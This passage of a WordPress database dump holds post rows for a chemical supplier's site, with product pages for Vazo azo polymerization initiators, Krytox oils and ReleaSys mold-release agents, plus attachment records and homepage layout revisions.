system on the market capable of releasing the most complex materials in the most demanding molding operations. &nbsp;Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. &nbsp;Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf" style="secondary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-19 02:11:55', '2016-08-19 02:11:55', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (561, 1, '2016-08-19 02:12:34', '2016-08-19 02:12:34', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n\r\n<h4 class="alt-font "><strong>Semi-Permanent<br>Mold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson<br>Exclusive Product\r\n\r\n<p></p><p></p><p></p><p></p><p></p><p></p><p></p><a class="button alt-button white" title="" href="../product-category/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience. &nbsp;ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations. &nbsp;Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. &nbsp;Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-19 02:12:34', '2016-08-19 02:12:34', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (563, 1, '2016-08-19 11:52:37', '2016-08-19 11:52:37', '', '', 'Products Page', 'publish', 'closed', 'closed', '', '563', '', '', '2016-08-19 11:52:37', '2016-08-19 11:52:37', '', 0, 'https://132.148.10.86/wordpress/?post_type=sidebar&#038;p=563', 0, 'sidebar', '', 0); 
INSERT INTO `wp_posts` VALUES (564, 1, '2016-08-19 11:53:28', '2016-08-19 11:53:28', '', 'Products Page', '', 'publish', 'closed', 'closed', '', 'products-page', '', '', '2016-08-19 11:53:28', '2016-08-19 11:53:28', '', 0, 'https://132.148.10.86/wordpress/?post_type=sidebar&#038;p=564', 0, 'sidebar', '', 0); 
INSERT INTO `wp_posts` VALUES (565, 1, '2016-08-19 12:42:09', '2016-08-19 12:42:09', '', 'vazo2', '', 'inherit', 'open', 'closed', '', 'vazo2', '', '', '2016-08-19 12:42:09', '2016-08-19 12:42:09', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/vazo2-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (566, 1, '2016-08-19 12:42:26', '2016-08-19 12:42:26', '', 'vazo2', '', 'inherit', 'open', 'closed', '', 'vazo2-2', '', '', '2016-08-19 12:42:26', '2016-08-19 12:42:26', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/vazo2-3.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (568, 3, '2016-08-19 13:10:50', '2016-08-19 13:10:50', '<h2>VAZO 52 | 2-2\'-Azobis(2,4-dimethylvaleronitrile)</h2>\r\n<h3>Low-Temperature Activation; Azo-radical Initiator</h3>\r\nVazo 52, known as 2-2\'-Azobis(2,4-dimethylvaleronitrile) is an azo free radical initiator  typically used as a polymerization initiator. Vazo 52 has the lowest initiation temperature within the Vazo product line. This product will thermally decompose to generate free radicals and nitrogen gas. Vazo 52 finds excellent utility as a blowing agent in foams composites. Benefits of Vazo 52 radical initiator include:\r\n<ul>\r\n 	<li>Ideal for low-temperature polymerization</li>\r\n 	<li>Does not compete in costly sides reactions</li>\r\n 	<li>Low polydispersity; monomer distribution control</li>\r\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\r\n 	<li>Can polymerize oxidation susceptible compound</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/vazo-free-radical-initiator/">For more information on Vazo radical initiators see our article section</a>\r\n\r\nVazo 52 radical Initiator are essentially insoluble in water, sparingly soluble in aliphatic hydrocarbons, and soluble in functionalized organic compounds and aromatic hydrocarbons. Vazo 67 is significantly more soluble in organic solvents and monomers than the other grades. Caution must be used in the handling of highly concentrated solutions to avoid a self-accelerating decomposition.\r\n<p class="largeText">Solvent-Soluble Vazo™ free radical sources offer a number of advantages over organic peroxides.</p>\r\n\r\n<ul>\r\n 	<li>\r\n<div>More stable than most peroxides, so can be stored under milder conditions and are not shock-sensitive.</div></li>\r\n 	<li>\r\n<div>Decompose with first-order kinetics; not sensitive to metals, acids, and bases; not susceptible to radical-induced decomposition. This makes Vazo™ free radicals more efficient and predictable than other free radical sources.</div></li>\r\n 	<li>\r\n<div>Produce less energetic radicals than peroxides, so there is less branching and cross-linking.</div></li>\r\n 	<li>\r\n<div>Are weak oxidizing agents, which lets them be used to polymerize unsaturated amines, mercaptans, and aldehydes without affecting pigments and dyes.</div></li>\r\n 	<li>\r\n<div>Are available in four grades to use over a wide temperature range.</div></li>\r\n</ul>\r\nFor safety, the maximum storage temperatures are as follows: Vazo™ 52 (10°C [50°F]); Vazo™ 64 and Vazo™ 67 (24°C [75°F]); Vazo™ 88 (35°C [95°F]); Shipping is generally done inside cardboard or plastic containers to reveal any internal pressures if the azo compounds are exposed to increased temperature exposure in transit or while in storage.', 'VAZO 52 | 2-2\'-Azobis(2,4-dimethylvaleronitrile)', 'Vazo 52, known as 2-2\'-Azobis(2,4-dimethylvaleronitrile) is a free radical source (FRS) typically used as a polymerization initiator. Vazo 52 has the lowest initiation temperature within the Vazo product line. This product will thermally decompose to generate free radicals and nitrogen gas. Benefits of Vazo 52 include:\r\n<ul>\r\n 	<li>Ideal for low-temperature polymerization</li>\r\n 	<li>Does not compete in costly sides reactions</li>\r\n 	<li>Low polydispersity; monomer distribution control</li>\r\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\r\n 	<li>Can polymerize oxidation susceptible compound</li>\r\n</ul>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/vazo-frs-product-banner-e1474375765567.jpg" alt="Vazo Authorized Distributor" />', 'publish', 'open', 'closed', '', 'vazo-52-radical-initiator', '', '', '2017-06-30 18:56:57', '2017-06-30 18:56:57', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=568', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (569, 3, '2016-08-19 13:09:55', '2016-08-19 13:09:55', '', 'Vazo 52', '', 'inherit', 'open', 'closed', '', 'vazo-52', '', '', '2016-08-19 13:09:55', '2016-08-19 13:09:55', '', 568, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Vazo-52-.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (570, 3, '2016-08-19 13:20:10', '2016-08-19 13:20:10', '', 'VazoT 52 PDS', '', 'inherit', 'open', 'closed', '', 'vazot-52-pds', '', '', '2016-08-19 13:20:10', '2016-08-19 13:20:10', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VazoT-52-PDS.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (571, 3, '2016-08-19 13:20:11', '2016-08-19 13:20:11', '', 'VazoT 64 PDS', '', 'inherit', 'open', 'closed', '', 'vazot-64-pds', '', '', '2016-08-19 13:20:11', '2016-08-19 13:20:11', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VazoT-64-PDS.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (572, 3, '2016-08-19 13:20:12', '2016-08-19 13:20:12', '', 'VazoT 67 PDS', '', 'inherit', 'open', 'closed', '', 'vazot-67-pds', '', '', '2016-08-19 13:20:12', '2016-08-19 13:20:12', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VazoT-67-PDS.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (573, 3, '2016-08-19 13:20:14', '2016-08-19 13:20:14', '', 'VazoT 88 PDS', '', 'inherit', 'open', 'closed', '', 'vazot-88-pds', '', '', '2016-08-19 13:20:14', '2016-08-19 13:20:14', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VazoT-88-PDS.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (574, 3, '2016-08-19 13:47:54', '2016-08-19 13:47:54', '', 'Vazo 52', '', 'inherit', 'open', 'closed', '', 'vazo-52-2', '', '', '2016-08-19 13:47:54', '2016-08-19 13:47:54', '', 568, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Vazo-52-1-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (575, 3, '2016-08-19 14:02:46', '2016-08-19 14:02:46', '<h2>VAZO 67 | 2,2’-Azodi(2-methylbutyronitrile)</h2>\r\n<h3>High Solubility; Predicable Polymerization Initiator</h3>\r\nVazo 67 radical initiator, also known as AMBN 2,2’-Azodi(2-methylbutyronitrile), is a free radical source (FRS) typically used as a polymerization initiator. Vazo 67 has similar thermal characteristics to Vazo 64, with the advantages of a safer decomposition product and higher solubility in a broader range of organic solvents.  Can be used as a drop-in for AIBN initiator and it will decomposes to generate free radicals and nitrogen gas. More cost-effective than organic peroxides of comparable activity, its relatively low molecular weight allows it to be one of the most cost effective options.   Benefits include:\r\n<ul>\r\n 	<li>Highest solubility in  solvents or monomers</li>\r\n 	<li>Does not compete in costly sides reactions</li>\r\n 	<li>Head-to-Tail polymerization: Low Polydispersity</li>\r\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\r\n 	<li>Can polymerize oxidation susceptible compound</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/vazo-free-radical-initiator/">For more information on Vazo radical initiators see our article section</a>\r\n<h3>VAZO 67 Radical Initiator</h3>\r\nAll the grades are Vazo radical azo Initiators are essentially insoluble in water, sparingly soluble in aliphatic hydrocarbons, and soluble in functionalized organic compounds and aromatic hydrocarbons. Vazo 67 radical initiator is significantly more soluble in organic solvents and monomers than the other grades. Caution must be used in the handling of highly concentrated solutions to avoid a self-accelerating decomposition.\r\n<p class="largeText">Solvent-Soluble Vazo™ free radical sources offer a number of advantages over organic peroxides.</p>\r\n\r\n<ul>\r\n 	<li>\r\n<div>More stable than most peroxides, so can be stored under milder conditions and are not shock-sensitive.</div></li>\r\n 	<li>\r\n<div>Decompose with first-order kinetics; not sensitive to metals, acids, and bases; not susceptible to radical-induced decompositions. This makes Vazo™ free radical sources more efficient and predictable than other free radical sources.</div></li>\r\n 	<li>\r\n<div>Produce less energetic radicals than peroxides, so there is less branching and cross-linking.</div></li>\r\n 	<li>\r\n<div>Are weak oxidizing agents, which lets them be used to polymerize unsaturated amines, mercaptans, and aldehydes without affecting pigments and dyes.</div></li>\r\n 	<li>\r\n<div>Are available in four grades to use over a wide temperature range.</div></li>\r\n</ul>\r\nFor safety, the maximum storage temperatures are as follows: Vazo™ 52 (10°C [50°F]); Vazo™ 64 and Vazo™ 67 (24°C [75°F]); Vazo™ 88 (35°C [95°F]);', 'VAZO 67 | 2,2’-Azodi(2-methylbutyronitrile)', 'Vazo 67, also known as AMBN 2,2’-Azodi(2-methylbutyronitrile), is a free radical source (FRS) typically used as a polymerization initiator. Vazo 67 has similar thermal characteristics to Vazo 64, with the advantages of a safer decomposition product and higher solubility in a broader range of organic solvents. Can be used as a drop-in for AIBN initiator and it will decomposes to generate free radicals and nitrogen gas.   Benefits include:\r\n<ul>\r\n 	<li>Highest solubility in  solvents or monomers</li>\r\n 	<li>Does not compete in costly sides reactions</li>\r\n 	<li>Head-to-Tail polymerization: Low Polydispersity</li>\r\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\r\n 	<li>Can polymerize oxidation susceptible compound</li>\r\n</ul>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/vazo-frs-product-banner-e1474375765567.jpg" alt="Vazo Authorized Distributor" />', 'publish', 'open', 'closed', '', 'vazo-67-radical-initiator', '', '', '2017-06-05 13:10:56', '2017-06-05 13:10:56', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=575', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (577, 3, '2016-08-19 14:22:15', '2016-08-19 14:22:15', '<h2>VAZO 88 | (1,1’-Azobis(cyanocyclohexane))</h2>\r\n<h3>Vazo 88 radical initiator; Highest Initiation Temperature; First-Order Kinetics</h3>\r\nVazo 88 radical initiator, also known as ACHN (1,1’-Azobis(cyanocyclohexane)), is an azo radical initiator source typically used as a polymerization initiator. Vazo 88 is used principally in higher temperature polymerizations with excellent solubilty in a wide variety of organic solvents. Vazo 88 will thermally decomposes to generate free radicals and nitrogen gas. More cost-effective than organic peroxides of comparable activity. Benefits include:\r\n<ul>\r\n 	<li>Higher temperature activation</li>\r\n 	<li>Does not compete in costly sides reactions</li>\r\n 	<li>Head-to-Tail polymerization</li>\r\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\r\n 	<li>Can polymerize oxidation susceptible compound</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/vazo-free-radical-initiator/">For more information on Vazo radical initiators see our article section</a>\r\n\r\nAll the grades are Vazo radical Initiators are essentially insoluble in water, sparingly soluble in aliphatic hydrocarbons, and soluble in functionalized organic compounds and aromatic hydrocarbons. Vazo 88 radical initiator is significantly more soluble in organic solvents and monomers than the other grades. Caution must be used in the handling of highly concentrated solutions to avoid a self-accelerating decomposition.\r\n\r\nSolvent-Soluble Vazo™ free radical sources offer a number of advantages over organic peroxides.\r\n<ul>\r\n 	<li>More stable than most peroxides, so can be stored under milder conditions and are not shock-sensitive.</li>\r\n 	<li>Decompose with first-order kinetics; not sensitive to metals, acids, and bases; not susceptible to radical-induced decompositions. This makes Vazo™ free radical sources more efficient and predictable than other free radical sources.</li>\r\n 	<li>Produce less energetic radicals than peroxides, so there is less branching and cross-linking.</li>\r\n 	<li>Are weak oxidizing agents, which lets them be used to polymerize unsaturated amines, mercaptans, and aldehydes without affecting pigments and dyes.</li>\r\n 	<li>Are available in four grades to use over a wide temperature range.</li>\r\n</ul>\r\n<p class="largeText">Vazo™ free radical sources initiate the addition of compounds such as chlorine, hydrogen sulfide, thiols, and phosphines across double bonds. Vazo™ reacts with unsaturated compounds in equimolar amounts to give monomers and oligomers, which contain two Vazo™-derived groups. These dinitriles can be further converted to amides, amines, or acids. Vazo™ free radical sources initiate halogenations as well as the air oxidation of aromatic and aliphatic hydrocarbons, acrylonitrile, methyl methacrylate, and vinyl acetate. Vazo™ free radical sources release nitrogen gas when used, which can be used as a blowing agent.</p>\r\nFor safety, the maximum storage temperatures are as follows: Vazo™ 52 (10°C [50°F]); Vazo™ 64 and Vazo™ 67 (24°C [75°F]); Vazo™ 88 (35°C [95°F]);', 'VAZO 88 | (1,1’-Azobis(cyanocyclohexane))', 'Vazo 88, also known as ACHN (1,1’-Azobis(cyanocyclohexane)), is a free radical source (FRS) typically used as a polymerization initiator. Vazo 88 is used principally in higher temperature polymerizations with excellent solubilty in a wide variety of organic solvents. Vazo 88 will thermally decomposes to generate free radicals and nitrogen gas. More cost-effective than organic peroxides of comparable activity. Benefits include:\r\n<ul>\r\n 	<li>Higher temperature activation</li>\r\n 	<li>Does not compete in costly sides reactions</li>\r\n 	<li>Head-to-Tail polymerization</li>\r\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\r\n 	<li>Can polymerize oxidation susceptible compound</li>\r\n</ul>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/vazo-frs-product-banner-e1474375765567.jpg" alt="Vazo Authorized Distributor" />', 'publish', 'open', 'closed', '', 'vazo-88-radical-initiator', '', '', '2017-06-05 13:16:13', '2017-06-05 13:16:13', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=577', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (579, 2, '2016-08-19 14:12:27', '2016-08-19 14:12:27', '', '143AA', 'Krytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.', 'publish', 'open', 'closed', '', '143aa', '', '', '2016-08-24 15:16:28', '2016-08-24 15:16:28', '', 0, 'https://132.148.10.86/wordpress/product/143aa/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (580, 2, '2016-08-19 14:12:44', '2016-08-19 14:12:44', '', '143AY', 'Krytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.', 'publish', 'open', 'closed', '', '143ay', '', '', '2016-08-24 15:17:59', '2016-08-24 15:17:59', '', 0, 'https://132.148.10.86/wordpress/product/143ay/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (581, 2, '2016-08-19 14:13:03', '2016-08-19 14:13:03', '', '143AB', 'Krytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.', 'publish', 'open', 'closed', '', '143ab', '', '', '2016-08-24 15:19:14', '2016-08-24 15:19:14', '', 0, 'https://132.148.10.86/wordpress/product/143ab/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (582, 2, '2016-08-19 14:13:22', '2016-08-19 14:13:22', '', '143AC', 'Krytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.', 'publish', 'open', 'closed', '', '143ac', '', '', '2016-08-24 15:23:20', '2016-08-24 15:23:20', '', 0, 'https://132.148.10.86/wordpress/product/143ac/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (583, 2, '2016-08-19 14:13:40', '2016-08-19 14:13:40', '', '143AD', 'Krytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.', 'publish', 'open', 'closed', '', '143ad', '', '', '2016-08-24 15:24:32', '2016-08-24 15:24:32', '', 0, 'https://132.148.10.86/wordpress/product/143ad/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (584, 3, '2016-08-19 14:24:28', '2016-08-19 14:24:28', '', 'VAZO 67', '', 'inherit', 'open', 'closed', '', 'vazo-67-2', '', '', '2016-08-19 14:24:28', '2016-08-19 14:24:28', '', 575, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-67.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (585, 1, '2016-08-19 14:34:52', '2016-08-19 14:34:52', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="center"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\n<p style="text-align: right;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="left" padding="0"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" size="normal"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 14:34:52', '2016-08-19 14:34:52', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (586, 1, '2016-08-19 14:40:20', '2016-08-19 14:40:20', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\n<p style="text-align: right;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="left" padding="0"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" size="normal"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 14:40:20', '2016-08-19 14:40:20', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
